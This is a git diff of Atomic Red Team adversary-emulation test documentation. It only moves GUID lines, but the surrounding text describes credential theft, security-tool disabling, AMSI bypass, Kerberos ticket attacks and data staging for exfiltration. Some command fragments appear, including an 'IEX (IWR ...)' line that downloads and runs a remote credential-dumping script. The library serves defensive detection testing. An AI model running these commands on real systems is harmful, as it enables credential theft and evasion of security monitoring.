## Atomic Test #1 - Search Through Bash History - -auto_generated_guid: 3cfde62b-7c33-4b26-a61e-755d6131c8ce - Search through bash history for specifice commands we want to capture + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 3cfde62b-7c33-4b26-a61e-755d6131c8ce + + + #### Inputs: diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md index 2f1e6642..8780b653 100644 --- a/atomics/T1552.004/T1552.004.md +++ b/atomics/T1552.004/T1552.004.md @@ -22,14 +22,16 @@ Some private keys require a password or passphrase for operation, so an adversar
## Atomic Test #1 - Private Keys - -auto_generated_guid: 520ce462-7ca7-441e-b5a5-f8347f632696 - Find private keys on the Windows file system. File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc + **Supported Platforms:** Windows +**auto_generated_guid:** 520ce462-7ca7-441e-b5a5-f8347f632696 + + + @@ -49,13 +51,15 @@ dir c:\ /b /s .key | findstr /e .key
## Atomic Test #2 - Discover Private SSH Keys - -auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 - Discover private SSH keys on a macOS or Linux system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 46959285-906d-40fa-9437-5a439accd878 + + + #### Inputs: @@ -86,13 +90,15 @@ rm #{output_file}
## Atomic Test #3 - Copy Private SSH Keys with CP - -auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 - Copy private SSH keys on a Linux system to a staging folder using the `cp` command. + **Supported Platforms:** Linux +**auto_generated_guid:** 7c247dc7-5128-4643-907b-73a76d9135c3 + + + #### Inputs: @@ -124,13 +130,15 @@ rm #{output_folder}
## Atomic Test #4 - Copy Private SSH Keys with rsync - -auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a - Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 864bb0b2-6bb5-489a-b43b-a77b3a16d68a + + + #### Inputs: diff --git a/atomics/T1552.006/T1552.006.md b/atomics/T1552.006/T1552.006.md index dbbe2d71..718e21a9 100644 --- a/atomics/T1552.006/T1552.006.md +++ b/atomics/T1552.006/T1552.006.md @@ -23,13 +23,15 @@ On the SYSVOL share, adversaries may use the following command to enumerate pote
## Atomic Test #1 - GPP Passwords (findstr) - -auto_generated_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f - Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. + **Supported Platforms:** Windows +**auto_generated_guid:** 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f + + + @@ -61,17 +63,19 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - GPP Passwords (Get-GPPPassword) - -auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c - Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found". + **Supported Platforms:** Windows +**auto_generated_guid:** e9584f82-322c-474a-b831-940fd8b4455c + + + #### Inputs: diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md index d0d3f03b..9bcf155c 100644 --- a/atomics/T1552.007/T1552.007.md +++ b/atomics/T1552.007/T1552.007.md @@ -14,13 +14,15 @@ An adversary may access the Docker API to collect logs that contain credentials
## Atomic Test #1 - ListSecrets - -auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a - A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a + + + #### Inputs: @@ -45,13 +47,15 @@ kubectl get secrets -n #{namespace}
## Atomic Test #2 - Cat the contents of a Kubernetes service account token file - -auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f - Access the Kubernetes service account access token stored within a container in a cluster. + **Supported Platforms:** Linux +**auto_generated_guid:** 788e0019-a483-45da-bcfe-96353d46820f + + + diff --git a/atomics/T1553.001/T1553.001.md b/atomics/T1553.001/T1553.001.md index 380c0107..82a30cb0 100644 --- a/atomics/T1553.001/T1553.001.md +++ b/atomics/T1553.001/T1553.001.md @@ -14,13 +14,15 @@ In typical operation, a file will be downloaded from the internet and given a qu
## Atomic Test #1 - Gatekeeper Bypass - -auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b - Gatekeeper Bypass via command line + **Supported Platforms:** macOS +**auto_generated_guid:** fb3d46c6-9480-4803-8d7d-ce676e1f1a9b + + + #### Inputs: diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 182abaad..c1386bca 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -26,13 +26,15 @@ In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -
## Atomic Test #1 - Install root CA on CentOS/RHEL - -auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e - Creates a root CA with openssl + **Supported Platforms:** Linux +**auto_generated_guid:** 9c096ec4-fd42-419d-a762-d64cc950627e + + + #### Inputs: @@ -67,13 +69,15 @@ fi
## Atomic Test #2 - Install root CA on Debian/Ubuntu - -auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff - Creates a root CA with openssl + **Supported Platforms:** Linux +**auto_generated_guid:** 53bcf8a0-1549-4b85-b919-010c56d724ff + + + #### Inputs: @@ -113,13 +117,15 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #3 - Install root CA on macOS - -auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 - Creates a root CA with openssl + **Supported Platforms:** macOS +**auto_generated_guid:** cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 + + + #### Inputs: @@ -158,13 +164,15 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #4 - Install root CA on Windows - -auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 - Creates a root CA with Powershell + **Supported Platforms:** Windows +**auto_generated_guid:** 76f49d86-5eb1-461a-a032-a480f86652f1 + + + #### Inputs: @@ -215,13 +223,15 @@ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
## Atomic Test #5 - Install root CA on Windows with certutil - -auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f - Creates a root CA with certutil + **Supported Platforms:** Windows +**auto_generated_guid:** 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f + + + #### Inputs: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index fc2bed9c..805a501a 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -14,13 +14,15 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a
## Atomic Test #1 - Mount ISO image - -auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa - Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + **Supported Platforms:** Windows +**auto_generated_guid:** 002cca30-4778-4891-878a-aaffcfa502fa + + + #### Inputs: @@ -62,15 +64,17 @@ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/
## Atomic Test #2 - Mount an ISO image and run executable from the ISO - -auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc - Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + **Supported Platforms:** Windows +**auto_generated_guid:** 42f22b00-0242-4afc-a61b-0da05041f9cc + + + #### Inputs: diff --git a/atomics/T1555.001/T1555.001.md b/atomics/T1555.001/T1555.001.md index bdc572de..76b62aaf 100644 --- a/atomics/T1555.001/T1555.001.md +++ b/atomics/T1555.001/T1555.001.md @@ -12,9 +12,6 @@ To manage their credentials, users have to use additional credentials to access
## Atomic Test #1 - Keychain - -auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 - ### Keychain Files ~/Library/Keychains/ @@ -26,9 +23,14 @@ auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) [Keychain dumper](https://github.com/juuso/keychaindump) + **Supported Platforms:** macOS +**auto_generated_guid:** 1864fdec-ff86-4452-8c30-f12507582a93 + + + #### Inputs: diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index b460c84c..d780ed3d 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -22,17 +22,19 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
## Atomic Test #1 - Run Chrome-password Collector - -auto_generated_guid: 8c05b133-d438-47ca-a630-19cc464c4622 - A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}. Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb. Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml) + **Supported Platforms:** Windows +**auto_generated_guid:** 8c05b133-d438-47ca-a630-19cc464c4622 + + + #### Inputs: @@ -77,15 +79,17 @@ Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
## Atomic Test #2 - Search macOS Safari Cookies - -auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b - This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`. + **Supported Platforms:** macOS +**auto_generated_guid:** c1402f7b-67ca-43a8-b5f3-3143abedc01b + + + #### Inputs: @@ -111,14 +115,16 @@ grep -q "#{search_string}" "Cookies.binarycookies"
## Atomic Test #3 - LaZagne - Credentials from Browser - -auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014 - The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system. LaZagne is an open source application used to retrieve passwords stored on a local computer. + **Supported Platforms:** Windows +**auto_generated_guid:** 9a2915b3-3954-4cce-8c76-00fbf4dbd014 + + + #### Inputs: diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index 3e333580..24135db4 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -14,14 +14,16 @@
## Atomic Test #1 - Extract Windows Credential Manager via VBA - -auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b - This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt + **Supported Platforms:** Windows +**auto_generated_guid:** 234f9b7c-b53d-4f32-897b-b880a6c9ea7b + + + @@ -64,13 +66,15 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] - -auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 - This module will extract the credentials from Windows Credential Manager + **Supported Platforms:** Windows +**auto_generated_guid:** c89becbe-1758-4e7d-a0f4-97d2188a23e3 + + + @@ -90,13 +94,15 @@ IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/
## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] - -auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 - This module will extract the credentials from Windows Credential Manager + **Supported Platforms:** Windows +**auto_generated_guid:** 8fd5a296-6772-4766-9991-ff4e92af7240 + + + diff --git a/atomics/T1556.002/T1556.002.md b/atomics/T1556.002/T1556.002.md index 807c98bc..19efee24 100644 --- a/atomics/T1556.002/T1556.002.md +++ b/atomics/T1556.002/T1556.002.md @@ -14,13 +14,15 @@ Adversaries can register malicious password filters to harvest credentials from
## Atomic Test #1 - Install and Register Password Filter DLL - -auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c - Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. + **Supported Platforms:** Windows +**auto_generated_guid:** a7961770-beb5-4134-9674-83d7e1fa865c + + + #### Inputs: diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md index ba58dac9..c08b28e8 100644 --- a/atomics/T1558.001/T1558.001.md +++ b/atomics/T1558.001/T1558.001.md @@ -14,15 +14,17 @@ The KDC service runs all on domain controllers that are part of an Active Direct
## Atomic Test #1 - Crafting golden tickets with mimikatz
-
-auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af
-
Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 9726592a-dabc-4d4d-81cd-44070008b3af
+
+
+
#### Inputs:
diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md
index c33a6ec5..a3155891 100644
--- a/atomics/T1558.003/T1558.003.md
+++ b/atomics/T1558.003/T1558.003.md
@@ -18,18 +18,20 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
## Atomic Test #1 - Request for service tickets
-
-auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a
-
This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 3f987809-3681-43c8-bcd8-b3ff3a28533a
+
+
+
diff --git a/atomics/T1559.002/T1559.002.md b/atomics/T1559.002/T1559.002.md
index 1e38d8cb..e7a4580a 100644
--- a/atomics/T1559.002/T1559.002.md
+++ b/atomics/T1559.002/T1559.002.md
@@ -18,13 +18,15 @@ Microsoft Office documents can be poisoned with DDE commands (Citation: SensePos
## Atomic Test #1 - Execute Commands
-
-auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
-
Executes commands via DDE using Microsfot Word
+
**Supported Platforms:** Windows
+**auto_generated_guid:** f592ba2a-e9e8-4d62-a459-ef63abd819fd
+
+
+
#### Run it with these steps!
@@ -50,13 +52,15 @@ The Field Code should now be displayed, change it to Contain the following:
## Atomic Test #2 - Execute PowerShell script via Word DDE
-
-auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3
-
When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 47c21fb6-085e-4b0d-b4d2-26d72c3830b3
+
+
+
@@ -76,9 +80,6 @@ start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
## Atomic Test #3 - DDEAUTO
-
-auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
-
TrustedSec - Unicorn - https://github.com/trustedsec/unicorn SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
@@ -86,9 +87,14 @@ SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-mswo
Word VBA Macro [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
+
**Supported Platforms:** Windows
+**auto_generated_guid:** cf91174c-4e74-414e-bec0-8d60a104d181
+
+
+
#### Run it with these steps!
diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md
index 17ca1c97..a376ff85 100644
--- a/atomics/T1560.001/T1560.001.md
+++ b/atomics/T1560.001/T1560.001.md
@@ -26,14 +26,16 @@ Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS o
## Atomic Test #1 - Compress Data for Exfiltration With Rar
-
-auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
-
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
+
+
+
#### Inputs:
@@ -80,14 +82,16 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar
-
-auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
-
Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT)
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 8dd61a55-44c6-43cc-af0c-8bdda276860c
+
+
+
#### Inputs:
@@ -131,14 +135,16 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip
-
-auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134
-
Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT)
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 01df0353-d531-408d-a0c5-3161bf822134
+
+
+
#### Inputs:
@@ -185,13 +191,15 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_h
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip
-
-auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
-
Note: Requires 7zip installation
+
**Supported Platforms:** Windows
+**auto_generated_guid:** d1334303-59cb-4a03-8313-b3e24d02c198
+
+
+
#### Inputs:
@@ -235,13 +243,15 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.
## Atomic Test #5 - Data Compressed - nix - zip
-
-auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0
-
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
+
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** c51cec55-28dd-4ad2-9461-1eacbc82c3a0
+
+
+
#### Inputs:
@@ -283,13 +293,15 @@ echo Please set input_files argument to include files that exist
## Atomic Test #6 - Data Compressed - nix - gzip Single File
-
-auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
-
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
+
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
+
+
+
#### Inputs:
@@ -319,13 +331,15 @@ rm -f #{input_file}.gz
## Atomic Test #7 - Data Compressed - nix - tar Folder or File
-
-auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
-
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
+
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 7af2b51e-ad1c-498c-aca8-d3290c19535a
+
+
+
#### Inputs:
@@ -367,13 +381,15 @@ echo Please set input_file_folder argument to a folder that exists
## Atomic Test #8 - Data Encrypted with zip and gpg symmetric
-
-auto_generated_guid: 0286eb44-e7ce-41a0-b109-3da516e05a5f
-
Encrypt data for exiltration
+
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 0286eb44-e7ce-41a0-b109-3da516e05a5f
+
+
+
#### Inputs:
diff --git a/atomics/T1560.002/T1560.002.md b/atomics/T1560.002/T1560.002.md
index 8cd45ba7..4f4895dc 100644
--- a/atomics/T1560.002/T1560.002.md
+++ b/atomics/T1560.002/T1560.002.md
@@ -18,13 +18,15 @@ Some archival libraries are preinstalled on systems, such as bzip2 on macOS and
## Atomic Test #1 - Compressing data using GZip in Python (Linux)
-
-auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8
-
Uses GZip from Python to compress files
+
**Supported Platforms:** Linux
+**auto_generated_guid:** 391f5298-b12d-4636-8482-35d9c17d53a8
+
+
+
#### Inputs:
@@ -66,13 +68,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #2 - Compressing data using bz2 in Python (Linux)
-
-auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d
-
Uses bz2 from Python to compress files
+
**Supported Platforms:** Linux
+**auto_generated_guid:** c75612b2-9de0-4d7c-879c-10d7b077072d
+
+
+
#### Inputs:
@@ -114,13 +118,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #3 - Compressing data using zipfile in Python (Linux)
-
-auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0
-
Uses zipfile from Python to compress files
+
**Supported Platforms:** Linux
+**auto_generated_guid:** 001a042b-859f-44d9-bf81-fd1c4e2200b0
+
+
+
#### Inputs:
@@ -162,13 +168,15 @@ which_python=`which python`; $which_python -V
## Atomic Test #4 - Compressing data using tarfile in Python (Linux)
-
-auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db
-
Uses tarfile from Python to compress files
+
**Supported Platforms:** Linux
+**auto_generated_guid:** e86f1b4b-fcc1-4a2a-ae10-b49da01458db
+
+
+
#### Inputs:
diff --git a/atomics/T1560/T1560.md b/atomics/T1560/T1560.md
index 7c1e6f91..2200cf0c 100644
--- a/atomics/T1560/T1560.md
+++ b/atomics/T1560/T1560.md
@@ -12,14 +12,16 @@ Both compression and encryption are done prior to exfiltration, and can be perfo
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
-
-auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597
-
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the files from the $env:USERPROFILE directory compressed in a file called T1560-data-ps.zip in the $env:USERPROFILE directory
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 41410c60-614d-4b9d-b66e-b0192dd9c597
+
+
+
#### Inputs:
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index 4681b94f..ba2e2af9 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -56,13 +56,15 @@
## Atomic Test #1 - Disable syslog
-
-auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
-
Disables syslog collection
+
**Supported Platforms:** Linux
+**auto_generated_guid:** 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
+
+
+
#### Inputs:
@@ -106,13 +108,15 @@ sudo #{package_installer}
## Atomic Test #2 - Disable Cb Response
-
-auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
-
Disable the Cb Response service
+
**Supported Platforms:** Linux
+**auto_generated_guid:** ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
+
+
+
@@ -139,13 +143,15 @@ fi
## Atomic Test #3 - Disable SELinux
-
-auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
-
Disables SELinux enforcement
+
**Supported Platforms:** Linux
+**auto_generated_guid:** fc225f36-9279-4c39-b3f9-5141ab74f8d8
+
+
+
@@ -169,13 +175,15 @@ setenforce 1
## Atomic Test #4 - Stop Crowdstrike Falcon on Linux
-
-auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
-
Stop and disable Crowdstrike Falcon on Linux
+
**Supported Platforms:** Linux
+**auto_generated_guid:** 828a1278-81cc-4802-96ab-188bf29ca77d
+
+
+
@@ -201,13 +209,15 @@ sudo systemctl start falcon-sensor.service
## Atomic Test #5 - Disable Carbon Black Response
-
-auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
-
Disables Carbon Black Response
+
**Supported Platforms:** macOS
+**auto_generated_guid:** 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
+
+
+
@@ -233,13 +243,15 @@ sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.pli
## Atomic Test #6 - Disable LittleSnitch
-
-auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
-
Disables LittleSnitch
+
**Supported Platforms:** macOS
+**auto_generated_guid:** 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
+
+
+
@@ -263,13 +275,15 @@ sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
## Atomic Test #7 - Disable OpenDNS Umbrella
-
-auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
-
Disables OpenDNS Umbrella
+
**Supported Platforms:** macOS
+**auto_generated_guid:** 07f43b33-1e15-4e99-be70-bc094157c849
+
+
+
@@ -293,13 +307,15 @@ sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfi
## Atomic Test #8 - Disable macOS Gatekeeper
-
-auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
-
Disables macOS Gatekeeper
+
**Supported Platforms:** macOS
+**auto_generated_guid:** 2a821573-fb3f-4e71-92c3-daac7432f053
+
+
+
@@ -323,13 +339,15 @@ sudo spctl --master-enable
## Atomic Test #9 - Stop and unload Crowdstrike Falcon on macOS
-
-auto_generated_guid: b3e7510c-2d4c-4249-a33f-591a2bc83eef
-
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
+
**Supported Platforms:** macOS
+**auto_generated_guid:** b3e7510c-2d4c-4249-a33f-591a2bc83eef
+
+
+
#### Inputs:
@@ -361,14 +379,16 @@ sudo launchctl load -w #{userdaemon_plist}
## Atomic Test #10 - Unload Sysmon Filter Driver
-
-auto_generated_guid: 811b3e76-c41b-430c-ac0d-e2380bfaa164
-
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 811b3e76-c41b-430c-ac0d-e2380bfaa164
+
+
+
#### Inputs:
@@ -434,13 +454,15 @@ sysmon -accepteula -i
## Atomic Test #11 - Uninstall Sysmon
-
-auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
-
Uninstall Sysinternals Sysmon for Defense Evasion
+
**Supported Platforms:** Windows
+**auto_generated_guid:** a316fb2e-5344-470d-91c1-23e15c374edc
+
+
+
#### Inputs:
@@ -494,16 +516,18 @@ cmd /c sysmon -i -accepteula
## Atomic Test #12 - AMSI Bypass - AMSI InitFailed
-
-auto_generated_guid: 695eed40-e949-40e5-b306-b4031e4154bd
-
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 695eed40-e949-40e5-b306-b4031e4154bd
+
+
+
@@ -527,15 +551,17 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
## Atomic Test #13 - AMSI Bypass - Remove AMSI Provider Reg Key
-
-auto_generated_guid: 13f09b91-c953-438e-845b-b585e51cac9b
-
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\" to verify that it is gone.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 13f09b91-c953-438e-845b-b585e51cac9b
+
+
+
@@ -559,15 +585,17 @@ New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4
## Atomic Test #14 - Disable Arbitrary Security Windows Service
-
-auto_generated_guid: a1230893-56ac-4c81-b644-2108e982f8f5
-
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
+
**Supported Platforms:** Windows
+**auto_generated_guid:** a1230893-56ac-4c81-b644-2108e982f8f5
+
+
+
#### Inputs:
@@ -598,14 +626,16 @@ net.exe start #{service_name} >nul 2>&1
## Atomic Test #15 - Tamper with Windows Defender ATP PowerShell
-
-auto_generated_guid: 6b8df440-51ec-4d53-bf83-899591c9b5d7
-
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings.
+
**Supported Platforms:** Windows
